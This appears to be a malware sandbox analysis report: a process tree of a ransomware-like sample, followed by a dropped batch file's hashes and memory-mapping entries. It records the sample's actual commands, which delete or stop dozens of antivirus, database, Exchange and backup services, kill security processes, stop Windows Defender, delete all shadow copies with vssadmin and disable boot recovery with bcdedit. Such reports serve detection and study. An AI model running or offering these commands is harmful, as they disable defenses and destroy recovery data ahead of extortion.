C:\Windows\SysWOW64\sc.exesc delete "nvspwmi"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "wmms"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "AvgAdminServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "AVG Antivirus"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "avgAdminClient"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SAVService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SAVAdminService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos AutoUpdate Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Clean Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Device Control Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos File Scanner Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Health Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Agent"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Client"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SntpService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swc_service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swi_service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos UI"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swi_update"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Web Control Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Safestore Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos System Protection Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "hmpalertsvc"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "RpcEptMapper"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SophosFIM"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swi_filter"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdGuardianDefaultInstance"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdServerDefaultInstance"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLSERVER"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLSERVERAGENT"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLBrowser"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer130"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SSISTELEMETRY130"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLWriter"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$VEEAMSQL2012"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerADHelper100"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerOLAPService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer100"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY$HL"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TMBMServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$PROGID"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$WOLTERSKLUWER"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$PROGID"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher$OPTIMA"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$OPTIMA"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$OPTIMA"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer$OPTIMA"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "msftesql$SQLEXPRESS"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "postgresql-x64-9.4"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "WRSVC"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ekrn"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ekrnEpsw"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klim6"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "AVP18.0.0"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "KLIF"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klpd"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupdisk"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klkbdflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klmouflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klhk"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "KSDE1.0.0"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "kltap"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ScSecSvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Core Mail Protection"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning Server"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning ServerEx"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Online Protection System"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "RepairService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Core Browsing Protection"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Quick Update Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "McAfeeFramework"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "macmnsvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "masvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "mfemms"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "mfevtp"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TmFilter"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TMLWCSService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "tmusa"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmPreFilter"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TMSmartRelayService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TMiCRCScanService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "VSApiNt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TmCCSF"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "tmlisten"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmProxy"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ntrtscan"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ofcservice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TmPfw"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "PccNTUpd"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "PandaAetherAgent"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "PSUAService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "NanoServiceMain"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "EPIntegrationService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPProtectedService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "EPRedline"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPUpdateService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "EPSecurityService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "UniFi"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im PccNTMon.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im NTRtScan.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmListen.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmCCSF.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmProxy.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TMBMSRV.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TMBMSRV.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmPfw.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im CNTAoSMgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlbrowser.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlwriter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlservr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im msmdsrv.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im MsDtsSrvr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlceip.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdlauncher.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im Ssms.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im SQLAGENT.EXE3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdhost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdlauncher.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlservr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im ReportingServicesService.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im msftesql.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im pg_ctl.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im postgres.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$ISARS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$MSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$ISARS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$MSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$ISARS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$ISARS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
C:\Windows\SysWOW64\net.exenet stop mr2kserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mr2kserv4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeADTopology3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeADTopology4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFBA3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFBA4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSA3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA4⤵
-
C:\Windows\SysWOW64\net.exenet stop ShadowProtectSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShadowProtectSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop SPAdminV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPAdminV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPTimerV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPTimerV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPTraceV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPTraceV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPUserCodeV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPUserCodeV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPWriterV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPWriterV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPSearch43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPSearch44⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop IISADMIN3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISADMIN4⤵
-
C:\Windows\SysWOW64\net.exenet stop firebirdguardiandefaultinstance3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop firebirdguardiandefaultinstance4⤵
-
C:\Windows\SysWOW64\net.exenet stop ibmiasrw3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ibmiasrw4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMonitorService3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBPOSDBServiceV123⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBPOSDBServiceV124⤵
-
C:\Windows\SysWOW64\net.exenet stop "IBM Domino Server (CProgramFilesIBMDominodata)"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"4⤵
-
C:\Windows\SysWOW64\net.exenet stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"4⤵
-
C:\Windows\SysWOW64\net.exenet stop IISADMIN3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISADMIN4⤵
-
C:\Windows\SysWOW64\net.exenet stop "Simply Accounting Database Connection Manager"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"4⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB13⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB14⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB23⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB24⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB33⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB34⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB44⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB53⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB54⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im UniFi.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a-Skjkmfvbkv.bin.exeC:\Users\Admin\AppData\Local\Temp\a-Skjkmfvbkv.bin.exe2⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Ksifbwxmmfbgnkill$-arab.batFilesize
53KB
MD5b57545cb36ef6a19fdde4b2208ebb225
SHA11d319740835ff12562e04cc74545a047bba63031
SHA256445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895
SHA5123618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856
-
memory/108-84-0x0000000000000000-mapping.dmp
-
memory/296-137-0x0000000000000000-mapping.dmp
-
memory/296-113-0x0000000000000000-mapping.dmp
-
memory/320-58-0x000000006F2F0000-0x000000006F89B000-memory.dmpFilesize
5.7MB
-
memory/320-59-0x000000006F2F0000-0x000000006F89B000-memory.dmpFilesize
5.7MB
-
memory/320-60-0x000000006F2F0000-0x000000006F89B000-memory.dmpFilesize
5.7MB
-
memory/320-121-0x0000000000000000-mapping.dmp
-
memory/320-56-0x0000000075F21000-0x0000000075F23000-memory.dmpFilesize
8KB
-
memory/320-55-0x0000000000000000-mapping.dmp
-
memory/480-81-0x0000000000000000-mapping.dmp
-
memory/480-138-0x0000000000000000-mapping.dmp
-
memory/576-125-0x0000000000000000-mapping.dmp
-
memory/576-61-0x0000000005EF0000-0x0000000006114000-memory.dmpFilesize
2.1MB
-
memory/576-54-0x0000000000A60000-0x0000000000A68000-memory.dmpFilesize
32KB
-
memory/580-104-0x0000000000000000-mapping.dmp
-
memory/640-119-0x0000000000000000-mapping.dmp
-
memory/692-120-0x0000000000000000-mapping.dmp
-
memory/692-94-0x0000000000000000-mapping.dmp
-
memory/700-136-0x0000000000000000-mapping.dmp
-
memory/700-114-0x0000000000000000-mapping.dmp
-
memory/772-118-0x0000000000000000-mapping.dmp
-
memory/828-126-0x0000000000000000-mapping.dmp
-
memory/836-108-0x0000000000000000-mapping.dmp
-
memory/844-67-0x0000000000000000-mapping.dmp
-
memory/852-70-0x0000000000000000-mapping.dmp
-
memory/872-107-0x0000000000000000-mapping.dmp
-
memory/872-128-0x0000000000000000-mapping.dmp
-
memory/892-87-0x0000000000000000-mapping.dmp
-
memory/932-72-0x0000000000000000-mapping.dmp
-
memory/1004-80-0x0000000000000000-mapping.dmp
-
memory/1016-74-0x0000000000000000-mapping.dmp
-
memory/1016-133-0x0000000000000000-mapping.dmp
-
memory/1080-62-0x0000000000000000-mapping.dmp
-
memory/1124-68-0x0000000000000000-mapping.dmp
-
memory/1128-124-0x0000000000000000-mapping.dmp
-
memory/1132-78-0x0000000000000000-mapping.dmp
-
memory/1164-66-0x0000000000000000-mapping.dmp
-
memory/1200-109-0x0000000000000000-mapping.dmp
-
memory/1204-139-0x0000000000000000-mapping.dmp
-
memory/1304-82-0x0000000000000000-mapping.dmp
-
memory/1404-117-0x0000000000000000-mapping.dmp
-
memory/1476-123-0x0000000000000000-mapping.dmp
-
memory/1508-131-0x0000000000000000-mapping.dmp
-
memory/1508-112-0x0000000000000000-mapping.dmp
-
memory/1540-79-0x0000000000000000-mapping.dmp
-
memory/1568-64-0x0000000000000000-mapping.dmp
-
memory/1572-103-0x0000000000000000-mapping.dmp
-
memory/1612-88-0x0000000000000000-mapping.dmp
-
memory/1616-73-0x0000000000000000-mapping.dmp
-
memory/1632-76-0x0000000000000000-mapping.dmp
-
memory/1632-115-0x0000000000000000-mapping.dmp
-
memory/1636-77-0x0000000000000000-mapping.dmp
-
memory/1684-134-0x0000000000000000-mapping.dmp
-
memory/1684-111-0x0000000000000000-mapping.dmp
-
memory/1700-129-0x0000000000000000-mapping.dmp
-
memory/1768-98-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/1768-101-0x0000000000408F1E-mapping.dmp
-
memory/1768-140-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/1768-100-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/1768-96-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/1768-95-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/1768-122-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/1768-92-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/1768-90-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/1768-89-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/1768-106-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/1780-83-0x0000000000000000-mapping.dmp
-
memory/1800-85-0x0000000000000000-mapping.dmp
-
memory/1808-97-0x0000000000000000-mapping.dmp
-
memory/1812-86-0x0000000000000000-mapping.dmp
-
memory/1836-116-0x0000000000000000-mapping.dmp
-
memory/1920-135-0x0000000000000000-mapping.dmp
-
memory/1924-110-0x0000000000000000-mapping.dmp
-
memory/1924-69-0x0000000000000000-mapping.dmp
-
memory/1952-130-0x0000000000000000-mapping.dmp
-
memory/1980-75-0x0000000000000000-mapping.dmp
-
memory/1992-65-0x0000000000000000-mapping.dmp
-
memory/2012-71-0x0000000000000000-mapping.dmp
-
memory/2024-127-0x0000000000000000-mapping.dmp
-
memory/2032-132-0x0000000000000000-mapping.dmp